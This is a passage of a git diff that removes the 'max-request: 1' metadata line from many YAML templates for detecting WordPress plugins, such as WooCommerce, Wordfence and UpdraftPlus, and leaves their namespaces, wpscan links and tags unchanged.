-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
-    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 2c7b16cb44..85aaf7ff16 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
-    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 9d6afa8d3f..0af322b728 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index 87721a245a..d4ac0d179e 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
-    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index 45e0dead0e..dbbadf3cfc 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
-    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index abec174ec3..401b0e479f 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
-    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 017cf76f11..2276545093 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
-    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
